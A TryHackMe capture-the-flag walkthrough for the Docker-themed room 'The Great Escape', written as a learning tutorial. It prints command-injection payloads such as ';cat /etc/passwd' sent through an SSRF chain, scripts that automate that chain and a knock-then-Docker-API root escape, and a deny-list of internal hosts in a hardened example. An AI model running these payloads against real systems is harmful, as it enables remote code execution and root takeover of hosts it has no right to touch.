TryHackMe: The Great Escape writeup/walkthrough
Writeup/tutorial for the room ‘The Great Escape’ on TryHackMe
Room Link | Medium difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>
This room focuses on exploiting Docker and there are 3 flags to get. I got the flags in a different order, but no need to worry, since you don’t need the first flag to move on and get the other flags. One last thing: I would recommend doing the Docker Rodeo room on THM first, as it has an intro to Docker and a few Docker vulnerabilities to exploit. It was helpful for me in understanding Docker, so do that room first if you don’t know about Docker or how to exploit it. Now let’s get started!
After a port scan with Threader3000, it reveals 2 open ports, 22 and 80, which I’m guessing are SSH and a web server, as those are the default ports for those services.
Going to port 80 shows us a website, PHOTO Classroom.
The hint for the first flag mentions that a well-known file may offer some help, so I checked robots.txt, which reveals 2 directories and a file.
Going to /exif-util shows a page that accepts an image and returns its EXIF data. I tried a few injections, but they didn’t work, as they would normally require an upload directory; when I intercepted the request in Burp Suite, it wasn’t uploading the file to the web server but sending the image data. This was a dead end.
I tried bruteforcing the directory for *.bak.txt files, but there seems to be some rate limiting, which always results in a 503 error. If you go to exif-util.bak.txt directly, it reveals an address that we can use.
http://<Machine_IP>/exif-util.bak.txt
If we go to the /api directory, we see the following message.
However, if we add exif to it, we get a completely different error, one I hadn’t seen before. All the errors I saw earlier were default 403 and 503 pages, but this one is different, which tells us /api/exif is a real endpoint.
Since the exif utility accepts a URL, as we saw earlier, we can use the url parameter to make the API fetch the address we found in the backup file. The API fetches the URL from inside the Docker network, so it reaches a host, api-dev-backup, that we cannot reach from outside; that is server-side request forgery (SSRF). This works:
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080
We can also append /exif?url= to the backup host’s address, on the assumption that it exposes the same endpoint, and see what comes back.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=
It gives us a curl error. A curl error message in the response means the backup service builds a curl command line from our url parameter and runs it, most likely through a shell; if so, a semicolon ends the curl command and whatever follows runs as a second command, which gives us remote code execution. We can try adding a semicolon and then reading /etc/passwd.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;cat /etc/passwd
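To make the bug concrete, here is an added example (not the room’s code, whose source we never see) of the pattern that produces exactly this behaviour: a fetch helper that pastes the caller’s URL into a shell command line, beside a hardened version that validates the URL and passes it to curl as a single argument. The allow-list and the short deny-list of internal hosts are assumptions chosen for this example; api-dev-backup is only in the deny-list because it is the internal host from the writeup.

```shell
#!/bin/sh
# Added example: the shape of the command-injection bug behind the curl
# error above, and the fix. Not code from the room or the writeup.

# VULNERABLE: $1 is interpolated into a string that sh then parses, so a
# url of ";id" becomes the two commands `curl -s` and `id`.
fetch_vulnerable() {
    sh -c "curl -s $1"
}

# FIXED, part 1: validate before the URL goes anywhere near a process.
# Scheme must be http(s); every character must come from a small URL
# alphabet (no ';', '|', '`', '$', quotes, spaces or newlines); the host
# must not be one of our own internal names. The deny-list below is a
# simplification for this example: real code resolves the host and refuses
# loopback, private and link-local ranges after resolution.
url_is_safe() {
    case $1 in
        http://*|https://*) ;;
        *) return 1 ;;
    esac
    case $1 in
        *[!A-Za-z0-9._~%/?=:\&-]*) return 1 ;;   # any char outside the allow-list
    esac
    host=${1#*://}; host=${host%%/*}; host=${host%%:*}
    [ -n "$host" ] || return 1
    case $host in
        localhost|127.*|0.*|10.*|192.168.*|169.254.*|172.1[6-9].*|172.2[0-9].*|172.3[01].*|api-dev-backup|*.internal|*.local)
            return 1 ;;
    esac
    return 0
}

# FIXED, part 2: no shell at all. The URL is one argv element, whatever it
# contains, and '--' stops curl from reading a leading '-' as an option.
fetch_fixed() {
    url_is_safe "$1" || { echo "rejected: $1" >&2; return 1; }
    curl -s --connect-timeout 2 --max-time 5 -- "$1"
}
```

Try `fetch_vulnerable ';echo INJECTED'` against `fetch_fixed ';echo INJECTED'`: the first prints INJECTED after curl complains about the missing URL, the second never starts curl.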
Unfortunately, we can’t read this file: the request is rejected because it contains a banned word (probably a word filter on the url parameter). If we list the current user’s home directory, we see a dev-note.txt file.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;ls ~
Let’s try reading this file.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;cat ~/dev-note.txt
This gives us a username and a password that we can try. When I tried these credentials on the login page and over SSH, they didn’t work. SSH didn’t return any output, so that’s another dead end. If you do an aggressive nmap scan on port 22, you’ll see that it marks ssh with a question mark, meaning it isn’t sure it actually is SSH. Let’s check the root directory for anything else that could be useful.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la /root
This reveals a .git directory, meaning /root is a git repository. The dev-note.txt says the flag was removed from the directory, but deleting a file only removes it from the working tree; the commit that added it is still in the history. With git we can read the log, see which changes were made and check whether the flag is there. The -C option makes git run as if it had been started in the given directory, so git -C /root log reads the repository in /root.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;git -C /root log
As you can see, Hydra made a few commits: adding a flag, removing the flag and fixing the dev note. We want the commit in which Hydra added the flag, so copy its hash, as marked in the image above, and use git show on it to view the file that was added.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;git -C /root show a3d30a7d0510dc6565ff9316e3fb84434916dee8
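Typing each command into the address bar gets tedious, and the browser silently percent-encodes spaces for us. The helper below is an added example, not part of the writeup: it builds the same nested URL as above, encodes the command the way the address bar would (spaces become %20, the ; / ~ = and ? that the writeup relies on are left as they are), and sends it with curl. The IP 10.10.10.10 in the usage line is a placeholder for <Machine_IP>; commands are assumed to be single-line.

```shell
#!/bin/sh
# Added helper (not from the writeup) for the SSRF -> command injection chain:
#   /api/exif?url=http://api-dev-backup:8080/exif?url=;<command>

# Percent-encode a command for the inner url= parameter. Characters in $keep
# are what a browser address bar leaves raw; everything else (space, quotes,
# '#', '+', '|', '<', '>', backslash, ...) becomes %XX so it survives the URL
# decode on api-dev-backup. '+' is encoded because a raw '+' in a query
# string decodes to a space.
urlencode() {
    s=$1; out=""; i=1; n=${#s}
    keep='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~:/?=&;,@!$()*'
    while [ "$i" -le "$n" ]; do
        c=$(printf '%s' "$s" | cut -c"$i")
        case $keep in
            *"$c"*) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # byte value of the character
        esac
        i=$((i + 1))
    done
    printf '%s' "$out"
}

# The exact URL the writeup types by hand, with the command encoded.
# $1 = target host (the <Machine_IP> placeholder), $2 = command to run on
# api-dev-backup.
rce_url() {
    printf 'http://%s/api/exif?url=http://api-dev-backup:8080/exif?url=;%s\n' \
        "$1" "$(urlencode "$2")"
}

# Send it and print the response (the command's output comes back in the
# body, wrapped in whatever the API normally returns).
run_cmd() {
    curl -s --max-time 15 "$(rce_url "$1" "$2")"
    echo
}

# Usage: sh rce.sh 10.10.10.10 'git -C /root log'
#        sh rce.sh 10.10.10.10 'cat ~/dev-note.txt'
if [ "$#" -ge 2 ]; then
    run_cmd "$1" "$2"
fi
```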
And we have a flag! There is also another part to this, where Hydra says that to access Docker we can knock on the given ports, after which Docker becomes accessible. I tried knocking on the given ports manually, but I probably did it wrong. I cloned a git repository that does port knocking and then checked whether the default Docker port, 2375, was open.
cd /opt
sudo git clone https://github.com/grongor/knock.git
cd knock
./knock <Machine_IP> 42 1337 10420 6969 63000
nmap <Machine_IP> -p 2375
Lo and behold, the Docker port was now open! The next 2 steps I give might be unnecessary, but I did them anyway: I added the machine IP with the Docker port to tell Docker to trust this instance and then restarted it.
sudo nano /etc/docker/daemon.json
I restarted my Docker service by stopping it and then starting it again after waiting at least 30 seconds.
sudo systemctl stop docker
<Wait 30 seconds>
sudo systemctl start docker
Now that that is over, we can look for the rest of the flags. Since docker -H <Machine_IP>:2375 works with no certificates, the port the knock opened is the Docker Engine API on plain TCP, without TLS or authentication, and whoever can reach the daemon can start containers with any bind mount they like, which amounts to root on the host. Checking the images, we see an alpine:3.9 image, which we can use to escape onto the host.
We are essentially mounting the host’s “/” directory at “/mnt” in a new container, chrooting into it and then connecting via a shell (Reference — Task 9).
docker -H <Machine_IP>:2375 images
docker -H <Machine_IP>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
cat /etc/passwd
As you can see, there is a user named hydra, the same name we saw earlier on the git commits. I exited the container and tried to get a bash shell instead of an sh shell. I then moved to the root directory and found the 3rd flag there.
exit
docker -H <Machine_IP>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt bash
cd /root
ls
cat flag.txt
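The knock, the check that 2375 really is Docker, and the host-root shell above can be one script. This is an added example, not commands from the writeup: it assumes bash (for /dev/tcp), coreutils timeout and the docker CLI on the attacker machine; the port sequence and the alpine:3.9 image are the ones the writeup uses, and the argument is the <Machine_IP> placeholder. The /_ping check is the reason nmap alone is not enough: a port being open says nothing about what listens on it.

```shell
#!/bin/sh
# Added example (not from the writeup): knock, confirm the Docker Engine API,
# then bind-mount the host root. Assumes bash, timeout and the docker CLI.

# One TCP connection attempt per port, in order. Knock ports are normally
# filtered (no reply at all), so each attempt is capped at one second and
# the failure is expected and ignored.
knock() {
    host=$1; shift
    for port in "$@"; do
        timeout 1 bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null || true
    done
}

# Is this really the Docker daemon? GET /_ping on the Engine API answers
# "200 OK" with the body "OK"; anything else (closed port, a decoy like
# endlessh, some other service) fails the check. Raw HTTP over /dev/tcp so
# the probe does not depend on curl.
docker_api_ping() {
    host=$1; port=${2:-2375}
    timeout 3 bash -c '
        exec 3<>"/dev/tcp/$0/$1" || exit 1
        printf "GET /_ping HTTP/1.0\r\nHost: %s\r\n\r\n" "$0" >&3
        head -n 1 <&3' "$host" "$port" 2>/dev/null | grep -q '^HTTP/1\.[01] 200'
}

# The escape: a throwaway container with the host's / bind-mounted at /mnt,
# then chroot into it. Everything typed here runs as root on the Docker host.
host_root_shell() {
    docker -H "tcp://$1:2375" run --rm -it -v /:/mnt alpine:3.9 chroot /mnt sh
}

# Usage: sh knock_escape.sh <Machine_IP>
if [ -n "${1-}" ]; then
    knock "$1" 42 1337 10420 6969 63000
    if docker_api_ping "$1"; then
        echo "Docker Engine API reachable on $1:2375, starting host shell" >&2
        host_root_shell "$1"
    else
        echo "$1:2375 is still closed or is not a Docker daemon" >&2
        exit 1
    fi
fi
```

The fix on the defending side is not to expose 2375 at all: the daemon should listen on its Unix socket only, or on TCP with --tlsverify and client certificates, because port knocking hides the door but is no substitute for authentication once it is open.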
There was 1 flag left. I exited the shell and then looked at the available containers and found a frontend container; given that we are looking for a web app flag, we can assume it will be found there. If you notice the last container, it is endlessh, which is what was causing the SSH connection not to work, since it isn’t a real SSH service.
docker -H <Machine_IP>:2375 ps
I got a shell in the frontend container and found the nginx directory. I believe some of the errors on the website leaked that it was running on nginx, and because of this we can find out where the web root is by looking through the config files.
docker -H tcp://<Machine_IP>:2375 exec -it dockerescapecompose_frontend_1 bash
cd /etc/nginx/conf.d/
cat default.conf
When we go to the web root given in the nginx config, we see a hidden directory called .well-known, which is what the flag 1 hint (a well-known file) was referring to. In this directory there is a file called security.txt, which has the hint for getting the web app flag.
cd /usr/share/nginx/html
ls -la | head
cd .well-known/
ls
cat security.txt
We can use curl with the --head option to send a HEAD request; a HEAD response carries only headers, no body, so whatever the endpoint puts in its headers is printed directly.
curl --head http://<Machine_IP>/api/fl46
I hope this helps you all, and if it doesn’t, please leave a comment and I’ll try to help out. Getting the initial foothold was a difficult task, and I followed John Hammond’s tutorial, which was very helpful. I definitely learned a few things and hope you do too. Follow me for more write-ups!